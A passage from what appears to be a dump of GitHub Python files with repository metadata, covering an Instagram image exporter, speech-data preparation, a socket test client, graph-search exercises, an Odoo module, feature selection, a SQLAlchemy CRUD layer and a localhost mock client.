+ str(web_entities_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, float(web_entity.score))\n\n visually_similar_images = web_detection.visually_similar_images\n\n # Write Visually Similar image URLs into Excel WorkBook\n visually_similar_images_lbl = 0\n for visually_similar_image in visually_similar_images:\n visually_similar_images_lbl = visually_similar_images_lbl + 1\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"URL\" + str(visually_similar_images_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, visually_similar_image.url)\n\n # Write Best Guess Label(s) into Excel WorkBook\n best_guess_labels = web_detection.best_guess_labels\n best_guess_labels_lbl = 0\n for best_guess_label in best_guess_labels:\n best_guess_labels_lbl = best_guess_labels_lbl + 1\n cell_count = cell_count + 1\n\n sheet1.write(cell_count, photo_cell_row, \"BEST_LABEL\" + str(best_guess_labels_lbl))\n sheet1.write(cell_count, photo_cell_row + 1,\n unicodedata.normalize('NFKD', best_guess_label.label).encode('ascii', 'ignore'))\n\n # END\n\n # COLOR PROPERTIES DETECTION\n\n response = client.image_properties(image=image)\n props = response.image_properties_annotation\n colors = props.dominant_colors.colors\n\n # Write Colour(s) into Excel WorkBook\n color_lbl = 0\n for color in colors:\n color_lbl = color_lbl + 1\n cell_count = cell_count + 1\n\n red = int(color.color.red)\n green = int(color.color.green)\n blue = int(color.color.blue)\n\n sheet1.write(cell_count, photo_cell_row, \"COLOUR\" + str(color_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, 'R:' + str(red) + ' G:' + str(green) + ' B:' + str(blue))\n\n # END\n\n # LANGUAGE PROPERTIES DETECTION\n\n response = client.document_text_detection(image=image)\n document = response.full_text_annotation\n pages = document.pages\n\n # Write Language(s) into Excel WorkBook\n for page in pages:\n property_field = page.property\n lang_lbl = 0\n for language in property_field.detected_languages:\n lang_lbl = lang_lbl + 1\n cell_count = cell_count + 1\n sheet1.write(cell_count, photo_cell_row, \"LANGUAGE\" + str(lang_lbl))\n sheet1.write(cell_count, photo_cell_row + 1, language.language_code)\n # END\n\n # Save the photo name as Photo1, Photo2...Photo n in Excel Workbook\n sheet1.write_merge(0, 0, photo_cell_row, photo_cell_row + 1, photo_name)\n photo_cell_row = photo_cell_row + 2\n\n wb.save(excel_output_file)\n print(\"\\nFlushed content into Excel WorkBook.\\n>> \" + excel_output_file)\n\n\ndef get_all_file_paths(directory):\n # initializing empty file paths list\n image_paths = []\n\n # crawling through directory and subdirectories\n\n for root, directories, files in os.walk(directory):\n\n for image in files:\n\n if \".jpg\" in image:\n # join the two strings in order to form the full image_path.\n image_path = os.path.join(root, image)\n image_paths.append(image_path)\n\n if excel_output_file in image:\n # join the two strings in order to form the full image_path.\n image_path = os.path.join(root, image)\n image_paths.append(image_path)\n\n # returning all image paths\n return image_paths\n\n\ndef create_zip_folder():\n # path to folder which needs to be zipped\n directory = './'\n\n # calling function to get all file paths in the directory\n file_paths = get_all_file_paths(directory)\n\n # writing files to a zipfile\n with ZipFile(str(currentTime) + '-IMGS.zip', 'w') as zip:\n # writing each file one by one\n for file in file_paths:\n zip.write(file)\n print('\\nCompressed Zipped Folder Created.\\n>> ' + str(currentTime) + 
'-IMGS.zip')\n\n\ndef cleanup_images_jpg():\n filelist = [f for f in os.listdir('./') if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(os.path.join('./', f))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"amarkum/instagram-exporter","sub_path":"instagram-export.py","file_name":"instagram-export.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6883126866","text":"\"\"\"Converts eval files to correct format for decoding and scoring.\"\"\"\n\nimport kaldiio\nimport configargparse\nimport numpy as np\n\nfrom data_loading import build_segment_desc_dict, build_segment_dicts, get_file_paths\nfrom data_aug import write_to_ark, write_to_json\n\n\ndef prepare_split_eval(meetings, speakers, meeting_length=100):\n \"\"\"Split eval set into meetings of equal length, keeping order. Correct format for decoding.\n Write to json after calling this function.\n \n :param: dict meetings[meeting_id] = List[dvectors] (lists of segments for each meeting)\n :param: dict speakers[meeting_id] = List[str] (speaker label sequences)\n :param: int number of segments to split meetings into\n\n :return: dict meetings[split_meeting_id] = List[dvectors]: split meetings\n :return: dict speakers[split_meeting_id] = List[str]: split speaker sequences\n \"\"\"\n\n split_meetings = {}\n split_speakers = {}\n for meeting_id, meeting in meetings.items():\n split_meeting_num = 0\n segment_index = 0\n while segment_index + meeting_length <= len(meeting):\n # new meeting id removes MDM and appends split meeting digits with preceding zeros\n split_meeting_id = meeting_id[:3] + meeting_id[6:] + '-' + f\"{split_meeting_num:03d}\"\n split_meetings[split_meeting_id] = meeting[segment_index:segment_index+meeting_length]\n split_speakers[split_meeting_id] = speakers[meeting_id][segment_index:segment_index+meeting_length]\n segment_index += meeting_length\n split_meeting_num += 1\n if segment_index < len(meeting):\n # final split meeting may be shorter than meeting_length\n split_meeting_id = meeting_id[:3] + meeting_id[6:] + '-' + f\"{split_meeting_num:03d}\"\n split_meetings[split_meeting_id] = meeting[segment_index:]\n split_speakers[split_meeting_id] = speakers[meeting_id][segment_index:]\n\n return split_meetings, split_speakers\n\n\ndef produce_eval_scp(meetings, speakers, segment_desc_dict, dataset='eval'):\n \"\"\"Produces eval.scp in format required for scoring script (each line is one window).\n \n :param: dict meetings[meeting_id] = List[dvectors] (lists of segments for each meeting)\n :param: dict segment_desc_dict[meeting_id] = List(Tuple(start_index, end_index, speaker_label,\n start_time, end_time, duration))\n \"\"\"\n scp_meetings = {}\n scp_speakers = {}\n if dataset == 'eval':\n # this matches to existing scp\n speaker_mapping = {'MEE073': 174, 'FEO070': 175, 'FEO072': 176, 'MEE071': 177, 'MEO015': 178, \\\n 'FEE013': 179, 'MEE014': 180, 'FEE016': 181, 'FIE088': 182, 'FIO087': 183, 'FIO084': 184, \\\n 'FIO089': 185, 'MTD009PM': 186, 'MTD011UID': 187, 'MTD0010ID': 188, 'MTD012ME': 189}\n elif dataset == 'dev':\n speaker_mapping = {}\n current_speaker_num = 174\n for meeting_id, meeting in meetings.items():\n for segment_index in range(len(meeting)):\n start_time = round(segment_desc_dict[meeting_id][segment_index][3] * 100)\n end_time = round(segment_desc_dict[meeting_id][segment_index][4] * 100)\n speaker = speakers[meeting_id][segment_index]\n try:\n speaker_number = speaker_mapping[speaker]\n 
except:\n speaker_mapping[speaker] = current_speaker_num\n current_speaker_num += 1\n speaker_number = speaker_mapping[speaker]\n scp_meeting_id = 'AMIXXX-' + f\"{speaker_number:05d}\" + '-' + meeting_id[7:] + '-XXXXXX-11_XXXXXXX_' + \\\n f\"{start_time:07d}\" + \"_\" + f\"{end_time:07d}\"\n scp_speakers[scp_meeting_id] = speaker_number\n scp_meetings[scp_meeting_id] = meeting[segment_index]\n with kaldiio.WriteHelper('ark,scp:/home/mifs/jhrt2/newDNC/scoring/scoring_%s.ark,/home/mifs/jhrt2/newDNC/scoring/scoring_%s.scp' % (dataset, dataset)) as writer:\n for speaker_number in sorted(speaker_mapping.values()):\n for scp_meeting_id in scp_meetings:\n if scp_speakers[scp_meeting_id] == speaker_number:\n writer(scp_meeting_id, scp_meetings[scp_meeting_id])\n\n\ndef get_parser(): # official paths should be maintained in asr_train.py\n parser = configargparse.ArgumentParser(\n description=\"Prepare eval files\",\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--eval-emb', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/eval.scp\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/arks.concat/eval.scp\", help='')\n parser.add_argument('--eval-rttm', type=str,\n default=\"/home/mifs/jhrt2/newDNC/data/window_level_rttms/eval150_window_level.rttm\", help='')\n # parser.add_argument('--eval-emb', type=str,\n # default=\"/data/mifs_scratch/jhrt2/james/eval150\", help='')\n # parser.add_argument('--eval-rttm', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/eval.rttm\", help='')\n\n # parser.add_argument('--valid-emb', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/arks.meeting.cmn.tdnn/dev.scp\", help='')\n # note there are two dev window level rttms. 
Here using the silence stripped version\n # parser.add_argument('--valid-rttm', type=str,\n # default=\"/home/mifs/jhrt2/newDNC/data/rttms.concat/dev.rttm\", help='')\n parser.add_argument('--tdoa-directory', type=str,\n default=\"/data/mifs_scratch/jhrt2/BeamformIt/MDM_AMI_fixedref_10\", help='')\n return parser\n\n\ndef main():\n parser = get_parser()\n args, _ = parser.parse_known_args()\n dataset = 'eval' # NB: IF DO DEV, REMEMBER NOT DOING VAR NORMALISATION IN DATA_LOADING\n scp_path, rttm_path = get_file_paths(args, dataset)\n\n meetings, speakers = build_segment_dicts(args, dataset, emb=\"dvec\", tdoa=True, gccphat=True, tdoa_norm=False)\n for meeting_id in meetings:\n meetings[meeting_id] = np.array(meetings[meeting_id])\n\n meeting_length = 3385\n\n segment_desc_dict, _ = build_segment_desc_dict(rttm_path)\n\n produce_eval_scp(meetings, speakers, segment_desc_dict, dataset)\n\n split_meetings, split_speakers = prepare_split_eval(meetings, speakers, meeting_length)\n write_to_ark(split_meetings, dataset, \"None\")\n write_to_json(split_meetings, split_speakers, dataset, \"None\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jamest08/newDNC","sub_path":"espnet/data_prep/prep_eval_files.py","file_name":"prep_eval_files.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42504104358","text":"import sys\nimport socket\nimport time\nimport json\nimport argparse\n\nfrom interfaces import verbose_print, vverbose_print\nfrom protocom import pMsg, pMsgTyp, RemoteEnd\n\nBUFFER_SIZE = 128\nGameOn = 1\n\n# secret used to verify when connecting\ntest_conf = {\"writerlist\": {}, \"secret\": \"42\"}\ntest_conf[\"writerlist\"][0] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15000}\ntest_conf[\"writerlist\"][1] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15001}\ntest_conf[\"writerlist\"][2] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15002}\ntest_conf[\"writerlist\"][3] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15003}\ntest_conf[\"writerlist\"][4] = {\"ip\": \"127.0.0.1\", \"protocol_port\": 15004}\n\nclass mMsg(str):\n pass\n\ndef create_event(me, send_to):\n try:\n msg = input(\n \"Enter the next event : \"\n ) # input format Type Name Text - where Each are a single word\n # t, n, txt = m.split(\" \")\n except KeyboardInterrupt:\n return json.dumps({name: {\"type\": \"Error\", \"name\": \"N/A\", \"payload\": \"Error\"}})\n except Exception as e:\n print(\"ERROR:\", type(e), e)\n raise\n\n event = f\"{me}#{send_to}#{msg}\"\n return pMsg.format_msg(event)\n\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\n \"configfile\",\n nargs=\"?\",\n type=argparse.FileType(\"r\"),\n default=\"../testdata/config.writer\",\n help=\"configuration file (default stdin)\",\n )\n ap.add_argument(\"-me\", default=1, type=int, help=\"ID fyrir skrifara, mandatory\")\n ap.add_argument(\"-v\", default=True, type=bool, help=\"verbose\")\n ap.add_argument(\"-vv\", default=False, type=bool, help=\"Very verbose\")\n a = ap.parse_args()\n\n print(\"Running\")\n verbose_print(sys.argv[0], \"config: \", a.configfile, \"me:\", a.me, a.v, a.vv)\n verbose = a.v\n vverbose = a.vv\n verbose_print(\"\")\n\n \"\"\"\n read_data = a.configfile.read()\n config_list_of_peers = json.loads(read_data)\n verbose_print(config_list_of_peers)\n me = a.myID\n host = ''\n port = 0\n list_of_peers = {}\n for peer in config_list_of_peers:\n id = int(peer[\"id\"])\n if id == a.myID:\n host = 
peer[\"host\"] \n port = int(peer[\"protocol_port\"])\n else:\n paddr = peer[\"host\"], int(peer[\"protocol_port\"])\n list_of_peers[id] = paddr\n\n verbose_print(list_of_peers)\n \"\"\"\n\n list_of_peers = {}\n for pid, peer in test_conf[\"writerlist\"].items():\n id = int(pid)\n paddr = peer[\"ip\"], int(peer[\"protocol_port\"])\n list_of_peers[id] = paddr\n\n name = \"TESTclient\"\n # for pid, address in list_of_peers.items():\n # if pid != a.me:\n r_pid = 0\n r_address = list_of_peers[r_pid]\n\n print(\"Connecting to :\", r_address)\n host, port = r_address\n rpeer = RemoteEnd(r_pid, host, port)\n rpeer.connect()\n # s.settimeout(4)\n\n # Handshake initiate\n # msg = pMsg.verify_msg(a.me,r_pid)\n msg = pMsg.make_msg(pMsgTyp.c_request, a.me, r_pid, data=\"Geheimnis\")\n bmsg = pMsg.format_msg(msg)\n print(bmsg)\n print(pMsg.make_msg(pMsgTyp.c_reply, a.me, r_pid, data=\"Geheimnis Reply\"))\n rpeer.send_bytes(bmsg)\n # s.sendall(bmsg)\n\n # Handshake complete\n try:\n msg = rpeer.recv_bytes()\n print(msg)\n except KeyboardInterrupt:\n pass\n except socket.timeout as e:\n print(\"Error: Timeout - remote end hung up\") # , type(e), e.args)\n else:\n while True:\n \"\"\"try:\n msg = pMsg.read_single_msg(s)\n #data = sock.recv(BUFFER_SIZE)\n print(msg)\n except KeyboardInterrupt:\n break\n except socket.timeout as e:\n print(\"Error: Timeout - remote end hung up\") #, type(e), e.args)\n break\n \"\"\"\n # msg = data.decode()\n print(\" -- Invite :\", msg)\n\n event = create_event(a.me, r_pid)\n print(event)\n rpeer.send_bytes(event)\n time.sleep(2)\n\n","repo_name":"pieceofGit/Annall_Lightweight_Blockchain","sub_path":"src/tests/testProtocom.py","file_name":"testProtocom.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33570092410","text":"from collections import deque\r\n\r\nn, m, r = map(int, input().split())\r\ngraph = [[] for _ in range(n + 1)]\r\n\r\nvisited = [False] * (n + 1)\r\n\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\n\r\ndef dfs(v, visited):\r\n visited[v] = True\r\n graph[v].sort()\r\n res1.append(v)\r\n for x in graph[v]:\r\n if visited[x] == False:\r\n dfs(x, visited)\r\n\r\n\r\ndef bfs(v, visited):\r\n dq = deque([v])\r\n visited[v] = True\r\n\r\n while dq:\r\n cur = dq.popleft()\r\n res2.append(cur)\r\n graph[cur].sort()\r\n\r\n for x in graph[cur]:\r\n if visited[x] == False:\r\n dq.append(x)\r\n visited[x] = True\r\n\r\n\r\nres1 = []\r\n\r\ndfs(r, visited)\r\n\r\nvisited = [False] * (n + 1)\r\nres2 = []\r\n\r\nbfs(r, visited)\r\n\r\nfor x in res1:\r\n print(x, end=' ')\r\nprint()\r\nfor x in res2:\r\n print(x, end=' ')\r\n","repo_name":"dongjun-Yi/Algorithm","sub_path":"백준/Silver/1260. 
DFS와 BFS/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34397278078","text":"# -*- coding: utf-8 -*-\n\nimport itertools\nimport psycopg2\n\nimport odoo.addons.decimal_precision as dp\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import ValidationError, except_orm\n\nclass ProductTemplate (models.Model):\n _inherit = 'product.template'\n\n product_bundle_list = fields.One2many('product.bundle.line','product_bundle', string='Product Bundle', copy=True)\n bundle_okay = fields.Boolean('Bundle',default=False)\n amount_untaxed = fields.Monetary(string='Untaxed Amount', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_tax = fields.Monetary(string='Taxes', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_total = fields.Monetary(string='Total', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n amount_cost = fields.Monetary(string='Cost', store=True, readonly=True, compute='_amount_all', track_visibility='always')\n\n @api.depends('product_bundle_list.price_total')\n def _amount_all(self):\n\n for product in self:\n amount_untaxed = amount_tax = amount_cost =0.0\n for line in product.product_bundle_list:\n amount_untaxed += line.price_subtotal\n amount_tax += line.price_tax\n amount_cost +=line.product_id.standard_price\n product.update({\n 'amount_untaxed': amount_untaxed,\n 'amount_tax': amount_tax,\n 'amount_total': amount_untaxed + amount_tax,\n 'list_price': amount_untaxed + amount_tax,\n 'standard_price': amount_cost\n })\n\n @api.multi\n @api.onchange('bundle_okay')\n def untick_purchase(self):\n \tif self.bundle_okay == True:\n \t\tself.purchase_ok = False\n","repo_name":"rieki/odoo","sub_path":"product_bundle/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36641986415","text":"from time import time\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\nfrom cal_scores.wodeutil.nlp.metrics.eval_constants import *\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.svm import SVR\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.feature_selection import SelectFromModel, RFECV\nfrom mlxtend.feature_selection import SequentialFeatureSelector as mlxtend_SFS\nfrom sklearn.feature_selection import SequentialFeatureSelector as sklearn_SFS\nfrom models.models import regr_dict, regr_dict_regularized\n\n\ndef get_features_filter_method(df, corr_type='pearson', use_abs=True, include_labels=False):\n \"\"\"\n get features sorted by their absolute correlation value\n \"\"\"\n corr_matrix = df.corr(method=corr_type)\n against = \"coherence\"\n excludes = ['coherence', 'relevance', 'fluency', 'consistency', 'line_id', 'doc_id']\n if use_abs:\n feature_corrs = corr_matrix[against].abs().sort_values(ascending=False)\n else:\n feature_corrs = corr_matrix[against].sort_values(ascending=False)\n # if not include_labels:\n # feature_corrs = feature_corrs[~summeval_labels].copy()\n # scatter_matrix(df_abs[attr], figsize=(12, 10))\n # df_mix_path.plot(kind=\"scatter\", x=\"density\", y=\"coherence\")\n # plt.show()\n\n\ndef get_features_mlxtend_sfs(df_metrics, df_label):\n 
sfs_stats = defaultdict(set)\n num_of_features = 20\n # use_regr = [regr_forest, regr_lin, regr_lasso, regr_grad_boost, regr_adaboost, regr_lin_svr]\n use_regr = []\n subset_list = []\n curr_dict = {regr_forest: regr_dict_regularized[regr_forest],\n regr_lin: regr_dict_regularized[regr_lin],\n regr_bagging: regr_dict_regularized[regr_bagging],\n regr_mlp: regr_dict_regularized[regr_mlp],\n regr_adaboost: regr_dict_regularized[regr_adaboost],\n regr_voting: regr_dict_regularized[regr_voting],\n regr_grad_boost: regr_dict_regularized[regr_grad_boost]\n }\n # curr_dict = regr_dict_regularized\n for regr_name, regressor in curr_dict.items():\n if regr_name in use_regr or len(\n use_regr) == 0: # (set use_regr to empty lsit) len(use_regr) ==0 when use all regressors\n sfs = mlxtend_SFS(regressor,\n k_features=num_of_features,\n forward=True,\n floating=False,\n scoring='r2',\n cv=5,\n n_jobs=-1)\n sfs = sfs.fit(df_metrics, df_label)\n features = set(sfs.k_feature_names_)\n sfs_stats[regr_name] = features\n subset_list.append(sfs.subsets_)\n print(sfs_stats)\n\n\ndef min_max_scale(df_metrics, save_to):\n scaler = MinMaxScaler()\n mix_minmax = scaler.fit_transform(df_metrics)\n df_min_minmax = pd.DataFrame(mix_minmax, columns=df_metrics.columns)\n print(f\"len of df_min_minmax: {len(df_min_minmax)}\")\n df_min_minmax.to_csv(save_to, index=False)\n\n\ndef get_selected_features(df_metrics, df_label):\n lasso = LassoCV().fit(df_metrics, df_label)\n importance = np.abs(lasso.coef_)\n features_names = np.array(df_metrics.columns.values.tolist())\n print(f\"feature names: {features_names}\")\n print(f\"and their importance: {importance} with len {len(importance)}\")\n\n threshold = np.sort(importance)[-1] + 0.0001\n tic = time()\n sfm = SelectFromModel(lasso, threshold=threshold).fit(df_metrics, df_label)\n toc = time()\n print(f\"features seleted by SelectFromModel: {features_names[sfm.get_support()]}\")\n print(f\"done in {toc - tic:.3f}s\")\n\n\ndef sequential_feature_selector(df_metrics, df_label):\n forest = RandomForestRegressor()\n lasso = LassoCV().fit(df_metrics, df_label)\n # importance = np.abs(lasso.coef_)\n features_names = np.array(df_metrics.columns.values.tolist())\n sfs_fw = sklearn_SFS(forest, n_features_to_select=10, direction='forward', n_jobs=-1).fit(df_metrics, df_label)\n print(f\"features selected by sfs_fw: {features_names[sfs_fw.get_support()]}\")\n # sfs_bw = SequentialFeatureSelector(lasso, n_features_to_select=30, direction='backward').fit(df_metrics, df_label)\n # print(f\"features selected sfs_bw: {features_names[sfs_bw.get_support()]}\")\n\n\ndef RFECV_feature_selection(df_metrics, df_label):\n forest = RandomForestRegressor(n_jobs=-1)\n forest = SVR(kernel='linear')\n rfecv = RFECV(estimator=forest, step=1, n_jobs=-1, min_features_to_select=5, cv=5)\n rfecv.fit(df_metrics, df_label)\n print(f\"optimal number of eatures: {rfecv.n_features_}\")\n\n print(f\"scores: {rfecv.grid_scores_}\")\n plt.figure()\n plt.xlabel(\"Number of features selected\")\n plt.ylabel(\"Cross validation score\")\n plt.plot(range(5,\n len(rfecv.grid_scores_) + 5),\n rfecv.grid_scores_)\n plt.show()\n\n\nif __name__ == '__main__':\n get_features_filter_method(include_labels=True)\n","repo_name":"bzhao2718/ReliableSummEvalReg","sub_path":"models/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38343169319","text":"import 
csv\n\nall_tokens_file = '../data/train/all_tokens.csv'\nchars_file = '../data/analysis/chars2.csv'\n\nwith open(all_tokens_file, mode='r', encoding='utf8') as af:\n reader = csv.reader(af)\n titles = next(reader)\n\n chars = {}\n\n counter = 0\n for (sentence_id, token_id, class_name, str_before, str_after) in reader:\n sentence_id = int(sentence_id)\n token_id = int(token_id)\n\n counter += 1\n if counter % 100000 == 0:\n print(' processing data row %d' % counter)\n\n # skip strings with \"sil\", we don't know which one character is \"sil\"\n if 'sil' in str_after:\n continue\n\n # skip unchanged single characters or strings\n if len(str_before) == 1 and str_before == str_after:\n continue\n\n for char in str_before:\n if char not in chars:\n chars[char] = 1\n else:\n chars[char] += 1\n\n chars = sorted(list(chars.items()), key=lambda x: x[1], reverse=True)\n\nprint('Writing the file')\n\nwith open(chars_file, mode='w', encoding='utf8') as nf:\n writer = csv.writer(nf, quoting=csv.QUOTE_NONNUMERIC, lineterminator='\\n')\n writer.writerow(('char', 'count'))\n writer.writerows(chars)\n","repo_name":"apls777/text-normalization-token-classes","sub_path":"text_norm/data_analysis/chars2.py","file_name":"chars2.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1346184380","text":"import pathlib\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\n\r\nclass Net(nn.Module):\r\n def __init__(self, in_units, out_units):\r\n super(Net, self).__init__()\r\n self.l1 = nn.Linear(in_units, out_units)\r\n\r\n def forward(self, x):\r\n y = self.l1(x)\r\n return y\r\n\r\n# データ準備\r\nfolder_path = pathlib.Path(__file__).resolve().parent\r\nX_train = pd.read_csv(folder_path / \"X_train.csv\", header=None)\r\nX_train = torch.from_numpy(X_train.values.astype(np.float32))\r\ny_train = pd.read_csv(folder_path / \"y_train.csv\", header=None)\r\ny_train = torch.tensor(y_train[0].to_list())\r\n\r\nx = X_train[0:4]\r\ny = y_train[0:4]\r\n\r\nnet = Net(x.size()[1], 4)\r\noptimizer = optim.SGD(net.parameters(), lr=0.01)\r\ncriterion = nn.CrossEntropyLoss()\r\n\r\nfor i in range(100):\r\n optimizer.zero_grad()\r\n output = net(x)\r\n loss = criterion(output, y)\r\n loss.backward()\r\n optimizer.step()\r\n","repo_name":"oooto/nlp100","sub_path":"第8章_ニューラルネット/ans73.py","file_name":"ans73.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22738371716","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy import func\n\nimport models, schemas\n\nfrom datetime import datetime, timedelta\n\n\ndef create_measurement_and_configuration(db: Session, response: schemas.UM34CResponse):\n data = response.dict()\n for i, val in enumerate(data['group_data']):\n data.update({'group'+str(i)+'_mah': val['mah']})\n data.update({'group'+str(i)+'_mwh': val['mwh']})\n create_device(db, schemas.DeviceCreate(**{key: data[key] for key in schemas.DeviceCreate.schema()['properties'].keys()}))\n create_measurement(db, schemas.MeasurementCreate(**{key: data[key] for key in schemas.MeasurementCreate.schema()['properties'].keys()}))\n create_configuration(db, schemas.ConfigurationCreate(**{key: data[key] for key in schemas.ConfigurationCreate.schema()['properties'].keys()}))\n return {'created_id': db.query(func.max(models.Measurement.id)).first()[0]}\n\n\ndef 
get_all_devices(db: Session):\n return db.query(models.Device).offset(0).limit(5).all()\n\n\ndef get_all_configurations(db: Session):\n return db.query(models.Configuration).all()\n\n\ndef get_measurements_by_limit(db: Session, limit: int):\n offset = db.query(func.max(models.Measurement.id)).first()[0] - limit\n offset = offset if offset >= 0 else 0\n resp = db.query(models.Measurement).offset(offset).limit(limit).all()\n return resp\n\n\ndef get_measurements_by_hours(db: Session, hours: int):\n time_delta = datetime.now() - timedelta(hours=hours)\n time_delta = time_delta.replace(minute=0, second=0, microsecond=0)\n resp = db.query(models.Measurement).filter(models.Measurement.created_at > time_delta).all()\n return resp\n\n\ndef create_device(db: Session, device: schemas.DeviceCreate):\n if device.bd_address not in [device.bd_address for device in get_all_devices(db)]:\n db_device_data = models.Device(**device.dict())\n db.add(db_device_data)\n db.commit()\n db.refresh(db_device_data)\n\n\ndef create_measurement(db: Session, measurement: schemas.MeasurementCreate):\n db_measurement_data = models.Measurement(**measurement.dict())\n db.add(db_measurement_data)\n db.commit()\n db.refresh(db_measurement_data)\n\n\ndef create_configuration(db: Session, configuration: schemas.ConfigurationCreate):\n if configuration.bd_address not in [configs.bd_address for configs in get_all_configurations(db)]:\n db_configuration_data = models.Configuration(**configuration.dict())\n db.add(db_configuration_data)\n db.commit()\n db.refresh(db_configuration_data)\n else:\n db.query(models.Configuration).filter(models.Configuration.bd_address == configuration.bd_address).update(configuration.dict(), synchronize_session=\"fetch\")\n db.commit()\n","repo_name":"S3nsu1k4n/um34c_visualization","sub_path":"db_app/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17601749292","text":"# Create an ImageJ gateway with the newest available version of ImageJ.\nimport imagej\nij = imagej.init()\n\n# Load an image.\nimage_url = 'https://i.picsum.photos/id/237/200/300.jpg?hmac=TmmQSbShHz9CdQm0NkEjx1Dyh_Y984R9LpNrpvH2D_U'\njimage = ij.io().open(image_url)\n\n# Convert the image from ImageJ to xarray, a package that adds\n# labeled datasets to numpy (http://xarray.pydata.org/en/stable/).\nimage = ij.py.from_java(jimage)\n\n# Display the image (backed by matplotlib).\nij.py.show(image, cmap='gray')","repo_name":"torbensky/python-imagej-starter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19918030281","text":"import json\nimport socket\n\nimport requests\n\nfrom settings import MOCK_PORT, MOCK_HOST\n\nurl = f'http://{MOCK_PORT}:{MOCK_HOST}'\n\n\nclass SocketClient:\n\n def client_connecttion(self, host, port):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.settimeout(0.1)\n client.connect((host, port))\n return client\n\n def listener(self, client):\n total_data = []\n try:\n while True:\n data = client.recv(4096)\n if data:\n print(f'received data: {data}')\n total_data.append(data.decode())\n else:\n break\n except socket.timeout as e:\n print(e)\n finally:\n client.close()\n return ''.join(total_data).splitlines()\n\n def client_get(self, user):\n params = f'/get_login_status/{user}'\n client = 
self.client_connecttion(MOCK_HOST, int(MOCK_PORT))\n\n request = f'GET {params} HTTP/1.1\\r\\nHost:{MOCK_HOST}\\r\\n\\r\\n'\n client.send(request.encode())\n\n data = self.listener(client)\n return data\n\n def client_delete(self, user):\n params = f'/delete_user/{user}'\n client = self.client_connecttion(MOCK_HOST, int(MOCK_PORT))\n request = f'DELETE {params} HTTP/1.1\\r\\nHost:{MOCK_HOST}\\r\\n\\r\\n'\n client.send(request.encode())\n data = self.listener(client)\n return data\n\n def client_post(self, name):\n headers = {'Content-Type': 'application/json'}\n data = json.dumps({'name': name})\n\n return requests.post('http://127.0.0.1:1234/post_new_user_status', headers=headers, data=data)\n\n def client_put(self, name, status):\n headers = {'Content-Type': 'application/json'}\n data = json.dumps({'name': name, 'status': status})\n return requests.put('http://127.0.0.1:1234/change_status_user', headers=headers, data=data)\n","repo_name":"Shavragin/GUI_API_DB_TESTING","sub_path":"Mock_Homework_07/client/client_mock.py","file_name":"client_mock.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33695583688","text":"# Grigoriev, 451\n###################\nimport math\npreps = [' ', ',', ';', '.', '!', '?']\ncoded = dict()\ndecoded = dict()\n###################\n\n\ndef create_alphabet():\n alphabet = [chr(x) for x in range(ord('а'), ord('я') + 1)] + [\n chr(x) for x in range(ord('0'), ord('9') + 1)] + [x for x in preps]\n max_square = 